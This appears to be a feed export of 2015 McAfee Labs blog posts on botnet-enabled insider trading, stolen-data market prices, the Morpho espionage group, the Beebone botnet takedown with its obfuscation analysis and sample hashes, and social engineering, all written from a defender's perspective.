The Zeus malware’s video capture plug-in can detect if a remote desktop session is being launched and start recording that session. Examples of malware and their features can be viewed on YouTube:

  • See 5:38 for VNC and recording.


https://www.youtube.com/watch?v=FBaW6M1Edtk

  • Zeus 2015. Full panel configuration on services.


https://www.youtube.com/watch?v=UcHnrvS2-S8

Fraud is a crime conducted by individuals. Malware is a tool that can be useful to those individuals. Botnets connect interested individuals with tools they can use, and ready access to victims on whom the fraud can be committed.

A recent example concerning market information theft that began in 2010 and continued for five years involved hackers and traders who stole sensitive information that allowed trading resulting in an estimated $100 million in profits. The access to the stolen information was facilitated by botnets, and hackers disseminated instructions and tutorials, created by rogue traders, along with stolen information. A Ukrainian trading company, Jaspen Capital Partners, was identified by the SEC as a beneficiary of the stolen information used to trade on the nonpublic information.

In a settlement press announcement, the SEC stated that the company:

“…made approximately $25 million buying and selling contracts-for-differences (CFDs) on the basis of hacked press releases stolen from two newswire services between 2010 and 2014 and made additional profits trading on press releases stolen from a third newswire service in 2015. CFDs are derivatives that allow traders to place highly leveraged bets on the direction of a stock’s price movement. Without admitting or denying the SEC’s allegations, Jaspen and Supranonok agreed to be enjoined from violating the antifraud provisions of U.S. securities laws and related SEC antifraud rules and to return $30 million of allegedly ill-gotten gains.”

Whether the intended fraud is personal or corporate financial theft, or market manipulation by trading on information that no one else has the opportunity to know, the crime is based on the motive, means, and opportunity.

What’s next?

We write this article to boost awareness, not as a scare tactic. Our analysis of these and similar events are based on our customers submitting malware samples that connect to botnets known for selling their services to subscribers.

Infections by malware of this sort need to be further investigated, focusing on which endpoint was infected and the user’s role and rights, as well as if somebody watched over the victim’s back and what insider data could have been used.

Prevention

  • Keep your endpoint detection up to date.
  • In addition to promptly patching operating systems, keep all third-party software up to date, especially Adobe Flash.
  • Learn the capabilities of these malware families.

Contributors

We would like to thank the many people involved in this research, including members of the Malware Operations team, the Malware Sample Database team, the Foundstone Incident Response team, and our special coauthor of this research, Dr. Shane Shook.

Dr. Shook is well-known to Fortune 100 global companies for providing experienced leadership in incident analysis and response. He has led small and large teams of forensic investigators and computer and telecommunications systems analysts in many of the most notorious information security breach events of the past two decades. Shook’s experience in financial services and other industries, including standards development, helps McAfee clients understand technology risks in the context of their businesses.

 

 

 

 

 

 

 

 

The post A Dummies Guide to ‘Insider Trading’ via Botnet, Part 2 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-dummies-guide-to-insider-trading-via-botnet-part-2/feed/ 0
A Dummies Guide to ‘Insider Trading’ via Botnet https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-dummies-guide-to-insider-trading-via-botnet/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-dummies-guide-to-insider-trading-via-botnet/#respond Fri, 20 Nov 2015 22:44:36 +0000 http://blogs.mcafee.com/?p=24357 This post, the first of two parts, was written by Raj Samani, Christiaan Beek, and Shane Shook.  Want to spread malware? One of the most effective ways is to use a botnet, a network of infected systems. The goals of botnets have barely changed since we first encountered them more than a decade ago. We […]

The post A Dummies Guide to ‘Insider Trading’ via Botnet appeared first on McAfee Blogs.

]]>
This post, the first of two parts, was written by Raj Samani, Christiaan Beek, and Shane Shook. 

Want to spread malware? One of the most effective ways is to use a botnet, a network of infected systems. The goals of botnets have barely changed since we first encountered them more than a decade ago. We have often said that fighting cybercrime is a game of cat and mouse, with innovation from each side tipping the balance first one way, and then another. The evolution of botnets is no different.

In addition to common botnets plaguing our home computers to deliver spam or worse, we also find botnets targeting corporations to surreptitiously extract large collections of data to support incredibly profitable campaigns. These campaigns are aided by stolen credentials and the live viewing of (or interaction with) victims’ systems containing confidential information. These steps allow an attacker to get an insider’s view of infected organizations without actually being an insider—all while remaining undetected and manipulating data for financial gain.

In this two-part series we will first examine the evolution of the botnet, and follow up with a second post that shows how this new operating model is being actively used.

Botnet evolution

Originally robot networks were designed and used to enlist as many nodes as possible in criminal campaigns.

Traditional botnets focused on intrusion and data theft to perform the following activities:

  • Remote control of systems.
  • Interruption/denial of service.
  • Personal information theft (identity/personal credit/banking).

Over time, botnets began to incorporate other services:

  • “Doxing”/cataloging/selling stolen information.
  • On-demand targeting and access provisioning to corporate systems.
  • Third-party malware installation (RATs or ransomware) on systems.

Today, botnets provide managed services that include:

  • Anonymous communications routing and publishing.
  • Access management to subscribed networks/computers.
  • Help desk services: including 24/7 technical support.
  • Payment services (for electronic funds transfers or “crypto” currencies transactions).
  • Markets for “dark web” products and services.

The actors behind these botnets, the “botmasters,” use these operations to serve a bigger collective of campaigns by renting access to others, as well as for personal gain.

McAfee recently published the McAfee Labs 2016 Threats Predictions, which included a five-year forecast of the cybersecurity marketplace and its actors. In that article we mention that we do not quite expect the transformation of cybercrime into a full-fledged industry with suppliers, markets, service providers (“cybercrime as a service”), financing, trading systems, and a proliferation of associated business models.

However, this transformation, better described as an evolution, has been a product primarily of botnets, in which the botmasters now allow subscribers to request, view, and use protected and sensitive information. As customer needs and desires change, botnet services evolve to meet the demand. Payment for these services are often made with Bitcoins.

Traditional botnets were “owner operated,” but as their financial success and reputation grew, they became organized. The evolution of botnets from botmasters defining services to subscribers demanding products and services, has led to a customer-oriented industry. Subscribers vary, but their interests are generally reflected by the malware types in modern botnets that include:

  • Personal information stealers are targeted at consumers, most often through spam or phishing, and seek credentials and other personally identifiable information that facilitates identity and personal financial credit, banking, and trading theft.
  • Corporate information stealers are targeted at corporate employees or officers, commonly through phishing but also supported by social engineering techniques to target individuals or business functions that can facilitate the theft of human resources information, or credentials (and computer access) for financial (ERP/ACH/EFT) fraud and theft. 
  • Market information stealers are delivered via targeted phishing, or they use sophisticated marketing techniques such as “waterholing,” by infecting advertisements served to websites frequented by particular industry readers, or business networking services that create trusted links between people upon request or via introductions through social media. These are usually targeted at corporate officers of public companies, lawyers or auditors, or employees of financial services institutions and related media services. Information stealers facilitate the theft of protected or sensitive market information that can be used for insider trading.

The malware used are common in their design, differing only in whom they target, which instructions they employ to harvest different types of information, and which control sites they communicate with. Defining the type of crime is no longer about the tool(s) being used, but the evidence of activity. This evidence exists fundamentally in only three places: the control servers where stolen information is stored and made accessible to subscribers, victims’ financial (or trading) accounts where fraud has been conducted, and victims’ computer artifacts where the history of misuse can be assessed. 

Let’s look at some examples. 

Personal information stealer: This tool injects malware into browser processes to collect credentials used to conduct financial or securities transactions with the consumer’s bank. Modern malware types such as Dyre leverage additional features including remote desktop “back connects” that also allow botnet operators or subscribers to use the infected computer to log on to the consumer’s bank sites. Today’s information stealers even incorporate tools to defeat two-factor authentication through screen shots or other techniques.

Corporate information stealer: This method not only harvests credentials in a similar (though expanded) method as with personal information stealers, but the malware also facilitates backdoor access to the corporate network. The malware automatically collects system information about the compromised computer, user credentials and permissions, and—according to other scripted instructions—accessible corporate network information. The botmasters then catalog that information and either conduct additional reconnaissance and exploitation of the compromised corporate computer or network, often installing additional RATs to create multiple and persistent access to the organization, or simply sell the fact that they have access to certain computers in certain corporate estates to willing subscribers. Those subscribers subsequently either direct additional activities if the botmaster provides those services, or use the access for their own purposes.

Watch for part two of this post.

Contributors

We would like to thank the many people involved in this research, including members of the Malware Operations team, the Malware Sample Database team, the Foundstone Incident Response team, and our special coauthor of this research, Dr. Shane Shook.

Dr. Shook is well-known to Fortune 100 global companies for providing experienced leadership in incident analysis and response. He has led small and large teams of forensic investigators and computer and telecommunications systems analysts in many of the most notorious information security breach events of the past two decades. Shook’s experience in financial services and other industries, including standards development, helps McAfee clients understand technology risks in the context of their businesses.

 

The post A Dummies Guide to ‘Insider Trading’ via Botnet appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-dummies-guide-to-insider-trading-via-botnet/feed/ 0
What Is Your Customer Data Worth? https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/customer-data-worth/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/customer-data-worth/#respond Mon, 09 Nov 2015 19:30:15 +0000 https://blogs.mcafee.com/?p=46046 How to make sense of the market for stolen information. Personal data about you, me, and, most importantly, your customers is being openly sold via online marketplaces. Stolen data has become a mature commodity market, not unlike oil or metals, with supply-driven price fluctuations, different qualities of product, and a range of values and scarcities. […]

The post What Is Your Customer Data Worth? appeared first on McAfee Blogs.

]]>
How to make sense of the market for stolen information.

Personal data about you, me, and, most importantly, your customers is being openly sold via online marketplaces. Stolen data has become a mature commodity market, not unlike oil or metals, with supply-driven price fluctuations, different qualities of product, and a range of values and scarcities. This market has expanded far beyond credit card numbers, mirroring the growth of big data in legitimate organizations.

We recently published a report titled The Hidden Data Economy, detailing key types of information that are available and how much they cost. Since you cannot trust criminals, some of these marketplaces may be scams or may be using reputable brand names to perpetrate a different type of fraud, but that does not reduce the overall impression of a vibrant cybercrime economy.

Credit card numbers and other payment information are the most common stolen data, with the lowest price point and widest range of values. Large scale thefts, the increasing use of chip-and-PIN cards, and rapid response from credit card companies have driven down the value of basic card information. After a big data breach floods the market with new numbers, they may go for only a few dollars each.

However, add in some additional data and the price goes up quickly. Combine payment card information with date of birth, which is a common fraud prevention question, and the value jumps to $15 in the US and about $30 in other major countries. Add in the billing address and the username and password for the account, and the price goes up to between $30 and $45. Many options are available for the discerning criminal, including issuing bank, country, available balance, maximum withdrawal limit, and usability at an ATM, store, or online.

The Stolen Data Value Chain

Credit card numbers are the base metal of stolen data markets — widely available but not worth that much without additional info. Moving up the value chain are account login credentials for payment accounts or banking services, which appear to be priced based on the balance in the account. For less than 5% of the account balance, you can purchase login information for an online payment account. More valuable are full banking services, especially those with the ability to transfer funds to US banks, which sell for about 8% of the balance. Some sellers offer replacements if the purchased account no longer has the advertised balance, while others rely on reputation rankings, purchase feedback, and other common tools of online shopping to reassure customers.

High demand and automated theft operations have made the market for premium content account information attractive and apparently profitable. Whether you want to read some comic books ($0.55), watch online video (up to $1), get access to premium cable channels ($7.50), or watch live professional sports ($15), stolen login credentials are readily available. In an ironic twist, you can even buy stolen credentials to Dark Web markets.

Rare and more specific are logins for individual companies, open vulnerabilities to valuable systems at banks and airlines, access to industrial machines or critical infrastructure, and even stolen enterprise datasets. Just like rare art or jewels, this type of stolen data does not typically carry a direct price tag; instead, value is negotiated between the buyer and seller. Also like stolen art, the prospect of commissioned thefts is probably not very far away, if it is not here already.

With such a significant number of data breaches making headlines over the last two years, it’s not surprising to see so much consumer data for sale. But the wide variety of data and related profit-making schemes never cease to surprise those of us monitoring the Dark Web on an ongoing basis. Beyond the aforementioned stolen data types, you can also find personal identities, social media access, email accounts, medical information, and much more.

I know from direct conversations with organizations that there is quite a bit of apathy on the subject of cybercrime. Even today, after all the headlines, cybercrime still seems intangible. Too many of us still fail to realize cybercrime is simply the digital evolution of crime, and given the widespread apathy, the emergence of an increasingly established hidden data economy is the destination at which we are bound to arrive. It’s a constant and important reminder for those of us committed to making our connected world safe for our connected lives.

View the original post on Dark Reading.

The post What Is Your Customer Data Worth? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/customer-data-worth/feed/ 0
We’ve Been Hacked! Okay, I’ll Deal With It Next Week https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/weve-hacked-okay-ill-deal-next-week/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/weve-hacked-okay-ill-deal-next-week/#respond Thu, 15 Oct 2015 04:01:22 +0000 https://blogs.mcafee.com/?p=45653 That was the message I got from a CEO when we presented evidence that their organization had been compromised and the attackers had been free to roam for months, resulting in the theft of terabytes worth of data. Actually, the exact words were “So we’ve been hacked, eh? Well, it’s Friday afternoon now so I […]

The post We’ve Been Hacked! Okay, I’ll Deal With It Next Week appeared first on McAfee Blogs.

]]>
That was the message I got from a CEO when we presented evidence that their organization had been compromised and the attackers had been free to roam for months, resulting in the theft of terabytes worth of data. Actually, the exact words were “So we’ve been hacked, eh? Well, it’s Friday afternoon now so I will get my IT guy to look into it on Monday.

This response is not uncommon, and to be fair it is better than the usual indifferent response of “So what?” Yet it is disheartening to act as messenger only to realize that your audience has left the auditorium. It is partly because of this level of apathy that we undertook the research which has resulted in the new report I coauthored with my colleagues Francois Paget and Charles McFarland: The Hidden Data Economy: The Marketplace for Stolen Digital Information. Released today, the report highlights what happens with stolen data after a data breach.

In the past, we have covered the concept of “Hacking-as-a-Service,” and although that research did touch on the sale of stolen data—namely credit cards—it just scratched the surface. In this report, we delve deeper into the topic, highlighting ways in which all sorts of stolen data is monetized.

What worries us the most is just how personal some of the data is. Want to be an identity thief? Simply order the person you wish to become. I remember one conversation with law enforcement as we were writing the report. When we uncovered some individuals whose lives were being traded by criminals, we offered advice to the police on what to tell the victims. The conversation went along the lines of “You may not be aware of this, but your entire digital life including that of your family is being sold by criminals somewhere on the Internet.”

This is why data theft matters—it is often very personal. It is easy to talk about cybercrime having something to do with computers, but the reality is that the systems are just objects used in attacks. It matters because it can be about not being able to get a mortgage because someone has destroyed your credit rating. Or about being accused of sending hateful messages via your social media account because someone gained access to your mailbox. The truth is that cyber theft can, and often does, affect peoples’ lives in profound ways.

 

The post We’ve Been Hacked! Okay, I’ll Deal With It Next Week appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/weve-hacked-okay-ill-deal-next-week/feed/ 0
What Morpho Means: Why Hackers Target Intellectual Property And Business-Confidential Information https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/morpho-means-hackers-target-intellectual-property-business-confidential-information-2/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/morpho-means-hackers-target-intellectual-property-business-confidential-information-2/#respond Fri, 17 Jul 2015 19:26:32 +0000 https://blogs.mcafee.com/?p=44511 A quiet, professional cyberespionage group steals what every company wants to keep secret: valuable information that drives business. Welcome to the new normal. Corporate cyberespionage made the front page yesterday with the news of Morpho, also known as Wild Neutron. Regardless of what you call it, these revelations were the latest reminder of the growing […]

The post What Morpho Means: Why Hackers Target Intellectual Property And Business-Confidential Information appeared first on McAfee Blogs.

]]>
A quiet, professional cyberespionage group steals what every company wants to keep secret: valuable information that drives business. Welcome to the new normal.

Corporate cyberespionage made the front page yesterday with the news of Morpho, also known as Wild Neutron. Regardless of what you call it, these revelations were the latest reminder of the growing prominence of corporate espionage on the cyber landscape. The group targets major IT, pharmaceutical, legal and commodity companies spanning the globe, with concentrated efforts in the United States, Europe and Canada. They are highly organized, and hone in on victims to gather confidential information for future monetization.

The quick and dirty on how Morpho operates: the group’s modus operandi is a combination of watering hole attacks, zero-day exploits and multi-platform malware. They compromise websites pertinent to the target, exploit them and deliver either a Java-based zero-day exploit or a potential Internet Explorer zero-day exploit. Bottom line: this is cyberespionage via zero-day.

What we can draw from this is that they either have the technical know-how to discover zero-days— which is unlikely for a small group, as Morpho is suspected to be — or, they have the resources to purchase zero-day exploits on the black market. Such a reliance on what we refer to as the Cybercrime-as-a-Service marketplace would reinforce our assertion that if you are well-resourced, the “services” are available to get into the cybercrime game.

Morpho used custom Remote Access Tools (RATs) to sniff for targeted information, or other computers to infect. This group also installed backdoors allowing infected machines to communicate with C&C servers over encrypted connections. The smartest thing this group did, however, was clean up after itself – once emails and confidential information was stolen, they securely deleted files and event logs. It was as if they had never broken in.

It’s because of this careful cleanup and precise execution of zero-days, that Morpho has successfully operated since 2011. But, Morpho’s success can be attributed to one thing above all: its single-minded and professional approach to compromising, extracting and leveraging business confidential information (BCI) and intellectual property (IP).

Each is valuable to hackers and can spell trouble for any business if they are lost to competitors.

Intellectual property, any work or invention originating from a creative source—from art, books, designs, images, logos, and company names, to source code, product designs, pharmaceutical formulas, to building blue prints — is as much an asset as financial resources, property, or physical product. Massive resources are allocated to developing complex products and unique concepts the loss of which constitutes billions to companies working to develop ideas that boldly impact the future.

Large industries, like pharmaceutical, chemical, and technology — the very industries targeted by Morpho — are popular targets because their IP is easily reproduced or monetized. But smaller, disruptive companies, developing new ideas, technologies, and products to challenge existing businesses and entire industries, are by no means immune to such cyber-attacks.

To what cost? That’s difficult to quantify for obvious reasons. If a factory burns down, a public company is obligated to reflect that loss in its financial statements. Cyberespionage crimes are as difficult to quantify in cost as they often are to detect. But the U.S. Department of Commerce has estimated IP theft of all kinds (not just cybercrime) as a $200 to $250 billion annual hit to U.S. companies. The Organization for Economic Development (OECD) estimates that counterfeiting and piracy costs companies as much as $638 billion a year. Such numbers have prompted McAfee Labs to conclude that cyberespionage breaches are the “Crimes of the Century”—they impact both society’s present and future economics and progress.

Business confidential information could include investment data, resource exploration data, and sensitive commercial data such as trade secrets, processes, contracts, and operational information — is almost always valuable and actionable, making it an attractive target.

Not too long ago, business confidential information was at the center of a sport-related cyberespionage involving two professional baseball teams: St. Louis Cardinals and Houston Astros. As we saw there and are seeing again with Morpho, information pertinent to business plans, contracts, and transactions is as valuable a commodity (if not more so) than intellectual property. By gaining access to confidential information, Morpho and similar cybercriminals gain insight into an organization, discovering information that can be leveraged to pre-empt critical business transactions, product announcements, and investment news.

The Morpho group has succeeded because they have laser-like precision in what they’re looking for and how they go about getting it. Regardless of intention, tactics used, or business model, the main point is that one key common denominator is driving this sort of cybercrime: the value of information that drives business.

And, as the world’s economies grow increasingly dependent on information as critical capital, cyberespionage is simply part of the global competitive landscape upon which businesses are competing today. The Morpho and Wild Neutron revelations suggest that any other assessment by executive suites—anything less than the business critical need to protect IP and BCI—is dangerously naïve.

For more information on the cost of cybercrimes such as espionage, please see McAfee report with the Center for Strategic and International Studies (CSIS) on the economic impacts of cybercrime and cyberespionage.

View the original post on Dark Reading.

The post What Morpho Means: Why Hackers Target Intellectual Property And Business-Confidential Information appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/morpho-means-hackers-target-intellectual-property-business-confidential-information-2/feed/ 0
Update on the Beebone Botnet Takedown https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/beebone-update/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/beebone-update/#respond Mon, 20 Apr 2015 22:40:21 +0000 https://blogs.mcafee.com/?p=42811 On April 8, the takedown operation for the polymorphic botnet known as Beebone successfully concluded. This action redirected traffic from infected hosts to a sinkhole operated by the Shadowserver Foundation. In addition to halting additional infections and the continued morphing of the W32/Worm-AAEH worm, the sinkhole allows McAfee Labs and other partners in the takedown […]

The post Update on the Beebone Botnet Takedown appeared first on McAfee Blogs.

]]>
On April 8, the takedown operation for the polymorphic botnet known as Beebone successfully concluded. This action redirected traffic from infected hosts to a sinkhole operated by the Shadowserver Foundation. In addition to halting additional infections and the continued morphing of the W32/Worm-AAEH worm, the sinkhole allows McAfee Labs and other partners in the takedown to better understand the scope and complexity of the Beebone operation. We now have a more accurate count of infected hosts, we have identified additional indicators of compromise, and we have greater visibility into the botnet’s geographic reach.

Obfuscation capabilities

The sinkhole has revealed multiple obfuscation techniques. One mechanism is the botnet’s polymorphic nature, which guarantees unique samples for every download request. The actors behind Beebone went the extra mile by replacing the base worm sample multiple times per day. For example, from March to July 2014, the Beebone control server served at least one new sample every day (we conclude with 93.6% confidence) with up to four variant changes per day.

The worm switched from its custom crypter to the underground “29A Loader” crypter on July 21, 2014, losing all of its server-side polymorphism capabilities. To make up for the lost variety of distributed samples, the attackers replaced an average of eight variants per day, with 35 variant replacements on the same day the packer changed.

Although the samples were functionally similar across variants, the top-level crypter was consistently modified to change its final binary code. Some of the changes are listed below.

Third-party open-source software

Some of these samples included the entire “Wizard-TemplateXP” UI library, originally located at http://en.pudn.com/downloads27/sourcecode/windows/control/detail85571_en.html. We can verify this by comparing strings from the UI library source code to the W32/Worm-AAEH binaries. (See following images.)

These samples include:

  • b6e232d8ac1841fa87ebbd15bebec1ce
  • c880bd52cfaf3206f95eb49b5d51f1c657b7aa82
  • 15fc526edc6a5c665accfae06f8609c5cc93ac30
  • 449c870a9d5012a1cb6279638291de51e551490d)

 

20150420 Beebone 1

Change in encryption keys.

Another obfuscation technique is the use of the RC4 encryption algorithm to generate encrypted strings (prior to December 2013) and binaries (after December 2013). For any given base W32/Worm-AAEH crypter stub (which the polymorphic engine uses to mutate and generate other samples), the RC4 key is composed of the original project name concatenated with a hardcoded number treated as a string. Although the polymorphic engine randomizes the project name on each mutation, it keeps the hardcoded number intact, allowing us to identify base variants generated by the polymorphic engine. However, some samples introduce an additional round of RC4 encryption with a one-character string, starting from “0” and stopping at “9” before moving to a new obfuscation technique.

[table caption=”” width=”370″ colwidth=”150|150|150″ colalign=”left|left”]
Sample,
0d796cd23d03500879799f586136d548,“1” as first key,
14c761471b2659d5a63cfee50eca029d,“2” as first key,
14fe9b39dbe3017c2a6351b49f5a344a,“3” as first key,
a9d385ac73119c26f62f312801d46499,“4” as first key,
ebf2de1a6552b0342d57286472ff7200,“5” as first key,
1340319fc03aa4313651301814d0d635,“6” as first key,
1344557ff83e92384894f7f7f8b94fbd,“7” as first key,
158e28794b970a477c5cf01a402bf3f0,“8” as first key,
[/table]

Change in fields needed for decryption
On December 12, 2013, dependence on the project name was removed entirely. After that date, samples could use any string present in the sample as the RC4 key to decrypt the final payload. The intent of this change was likely to make static detection by antimalware scanners more difficult. This approach was used until March 31, 2014. After that day, the crypter began to use position-independent code (for example, 6620235fced076d1d7ce9b1c7c58967b) to partially implement its unpacking functionality. An additional layer of obfuscation was added on April 14, 2014, when the data type of variables storing the location of encrypted data changed from an integer to a “currency” type, which is native to the Visual Basic 6 language. Although this was a simple change in the crypter source code, its effect on final binaries is immense. Instead of having the location appear directly in a binary as a 32-bit value, with a currency type it appears as the original value multiplied by 10,000. However, each sample unevenly splits the number into two separate numbers, requiring addition or subtraction (followed by a division by 10,000) to retrieve the location of the encrypted data (for example, b1121d10573440735f0db22b85a4a634). Although antimalware scanners can still detect these samples, it is more difficult.

Control server architecture
The control servers behind W32/Worm-AAEH used a MariaDB database (a MySQL alternative) along with the Webmin web-based database administration tool (an alternative for phpMyAdmin) to store and maintain data stolen from infected systems. It is likely that they remotely controlled their servers using the Secure Shell (SSH) tool.

20150420 Beebone 2

The Webmin interface for a control server used in August 2014.

The domains for the control servers were prefixed with “ns1.” to masquerade as DNS name servers. To make the deception appear authentic, the port used for DNS queries (53) was left open even though no name resolution took place.

The attackers changed the control server names more than five times a month on average, as shown in the table below.
[table caption=”” width=”250″ colwidth=”100″ colalign=”left|left”]
Date Ranges for Control Server Names
01-MAR-2014 to 12-MAR-2014
12-MAR-2014 to 17-MAR-2014
17-MAR-2014 to 19-MAR-2014
19-MAR-2014 to 21-MAR-2014
21-MAR-2014 to 22-MAR-2014
25-MAR-2014 to 27-MAR-2014
27-MAR-2014 to 31-MAR-2014
31-MAR-2014 to 04-APR-2014
05-APR-2014 to 08-APR-2014
08-APR-2014 to 28-APR-2014
29-APR-2014 to 02-MAY-2014
03-MAY-2014 to 08-MAY-2014
08-MAY-2014 to 20-MAY-2014
20-MAY-2014 to 22-MAY-2014
23-MAY-2014 to 26-MAY-2014
28-MAY-2014 to 01-JUN-2014
02-JUN-2014 to 03-JUN-2014
03-JUN-2014 to 07-JUN-2014
09-JUN-2014 to 12-JUN-2014
13-JUN-2014 to 17-JUN-2014
20-JUN-2014 to 25-JUN-2014
27-JUN-2014 to 28-JUN-2014
03-JUL-2014 to 07-JUL-2014
07-JUL-2014 to 22-JUL-2014
22-JUL-2014 to 24-JUL-2014
25-JUL-2014 to 05-AUG-2014
06-AUG-2014 to 12-AUG-2014
12-AUG-2014 to 14-AUG-2014
14-AUG-2014 to 16-AUG-2014
16-AUG-2014 to 24-AUG-2014
28-AUG-2014 to 01-SEP-2014
02-SEP-2014 to 23-SEP-2014
24-SEP-2014 until Takedown
[/table]
Sinkhole results

These actions illustrate some of the mechanisms used to obfuscate the infection. As a result, we underestimated the scale of the Beebone botnet. Overnight reports from the Shadowserver team show that the scale of the botnet is about three times greater than earlier estimates.
[table caption=”” width=”475″ colwidth=”85|100|50″ colalign=”left|center|center”]
Date,Unique IP Addresses,Unique Geographies
2015-04-15,”37,828″,150
2015-04-14,”37,089″,145
2015-04-13,”37,243″,150
2015-04-12,”32,200″,147
2015-04-11,”33,984″,144
2015-04-10,”34,899″,149
2015-04-09,”34,314″,150
2015-04-08,”15,454″,140
[/table]

Although this data shows about 34,000 unique IP addresses per day, it does not mean that there are 34,000 infected computers, as some people may connect for research purposes and other systems may be turned off. We hope to see the number of unique connections to the sinkhole decline as remediation begins to take effect.

We would like to thank and recognize F-Secure, Trend Micro, and Symantec for also developing removal tools for W32/Worm-AAEH.

 

I am indebted to my colleague Sanchit Karve for his assistance with this post. Sanchit (@s_karve) and Raj (@Raj_samani) can also be found on Twitter.

The post Update on the Beebone Botnet Takedown appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/beebone-update/feed/ 0
Takedown Stops Polymorphic Botnet https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/takedown-stops-polymorphic-botnet/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/takedown-stops-polymorphic-botnet/#respond Thu, 09 Apr 2015 18:43:04 +0000 https://blogs.mcafee.com/?p=42445 Several global law enforcement agencies—with assistance from McAfee —this week successfully dismantled the “Beebone” botnet behind a polymorphic worm known by McAfee as W32/Worm-AAEH. The purpose of this worm is to facilitate downloading other malware, including ZBot banking password stealers, Necurs and ZeroAccess rootkits, Cutwail spambots, fake antivirus, and ransomware. The worm spreads quickly to […]

The post Takedown Stops Polymorphic Botnet appeared first on McAfee Blogs.

]]>
Several global law enforcement agencies—with assistance from McAfee —this week successfully dismantled the “Beebone” botnet behind a polymorphic worm known by McAfee as W32/Worm-AAEH. The purpose of this worm is to facilitate downloading other malware, including ZBot banking password stealers, Necurs and ZeroAccess rootkits, Cutwail spambots, fake antivirus, and ransomware. The worm spreads quickly to new machines and contains a cyclic update routine to replace itself with newer versions that increase the likelihood the worm will remain undetected by security software.

McAfee is aware of more than 5 million unique W32/Worm-AAEH samples. In September 2014, McAfee Labs telemetry detected more than 100,000 infections on systems in 195 countries with the majority in the United States. More recently, the number of infected systems McAfee Labs detected dropped to 12,000, largely due to our products’ effectiveness in blocking these attacks.

The botnet takedown, known as Operation Source, was led by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT). Most EU member states and law enforcement partners around the world coordinated in the action. The Dutch High Tech Crime Unit led the J-CAT effort. The U.S. Federal Bureau of Investigation provided valuable support.

The J-CAT is an effective multilateral platform established to fight cybercrime. The J-CAT works together on an operational level with public and private entities and academia to identify and mitigate the biggest cyber threats around the world and apprehend the persons responsible for them.

McAfee , along with Kaspersky Lab and Shadowserver, also provided assistance for this takedown. Shadowserver brought technical investigative skills and a rich set of information about the worm and its supporting botnet. More about the worm and botnet can be found in the McAfee Labs report Catch Me If You Can: Antics of a Polymorphic Botnet.

Dismantling the botnet’s communications infrastructure is only part of the response. Infected system remediation is equally important. Evasive steps taken by the botnet made this particularly difficult. The botnet not only changes the worm’s fingerprint many times every day, but it also actively blocks connections to security vendor websites (including mcafee.com). This is illustrated in the following image:

Poly botnet 2

Because W32/Worm-AAEH blocks connections to security software providers, those infected may have difficulty following links to download removal tools. To overcome that hurdle, the team at Shadowserver, whose support was critical to this operation, has made a webpage available from which these tools can be directly downloaded. McAfee customers can find a removal tool at http://www.mcafee.com/us/downloads/free-tools/stinger.aspx.

At McAfee, we believe in public-private partnerships. This operation is further evidence that only a combined response is capable of slowing down the ever-growing menace of cybercrime.

The post Takedown Stops Polymorphic Botnet appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/takedown-stops-polymorphic-botnet/feed/ 0
Hacking the Human OS: A Report on Social Engineering https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hacking-human-os-report-social-engineering/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hacking-human-os-report-social-engineering/#respond Thu, 19 Feb 2015 06:00:19 +0000 https://blogs.mcafee.com/?p=41253 Why are data breaches so commonplace?  Whether the attacks are against the energy sector as reported July 2014[i] with over 1,000 energy companies in North America and Europe reported to have been compromised.  To other attacks targeting other sectors (e.g. Operation Troy, Operation High Roller Nightdragon, etc.) it would appear that no sector is immune […]

The post Hacking the Human OS: A Report on Social Engineering appeared first on McAfee Blogs.

]]>
Why are data breaches so commonplace?  Whether the attacks are against the energy sector as reported July 2014[i] with over 1,000 energy companies in North America and Europe reported to have been compromised.  To other attacks targeting other sectors (e.g. Operation Troy, Operation High Roller Nightdragon, etc.) it would appear that no sector is immune from data breaches. One common theme amongst these and other attacks is the initial infection vector, namely exploiting the subconscious of a trusted employee. The modus operandi for most of the common data breaches is to leverage some form of social engineering to coerce the user into an action facilitating malware infection.

The prevalence of social engineering in many publicly disclosed cyber-attacks demonstrates either an inherent weakness in the acumen of victims to distinguish malicious communications, or that cybercriminals are using more complex methods to bypass the ‘human firewall’.  The answer of course likely lies somewhere in between these two statements, but regardless of the root case it does demonstrate that the first line of defense is evidently failing.  The default position to blame users as the cause for breaches which is not entirely fair.  Whilst there will be examples where clearly unsafe practices are being employed, our latest whitepaper “Hacking the Human Operating System” demonstrates the techniques used by attackers are to bypass the consciousness of their targets and attempt to manipulate victims through leveraging subconscious levers of influence.

The paper reviews the concept of social engineering; the techniques used within many of the recent cyber-attacks, levers used to influence victims, communication channels used, and suggested controls to reduce the risk..   Much has been written about social engineering.  The content of these sources vary widely, from definitions, to mitigation.  The purpose of the paper is to define the concepts, and introduce mitigations that go beyond simply suggesting that awareness is a panacea.

Unless we address the first line of defense, data breaches will continue to hog our Twitter timelines, and support the ever burgeoning cost of cybercrime.

Twitter@Raj_Samani

Twitter @McAfee_Labs

[i] http://www.bbc.co.uk/news/technology-28106478

The post Hacking the Human OS: A Report on Social Engineering appeared first on McAfee Blogs.

]]>
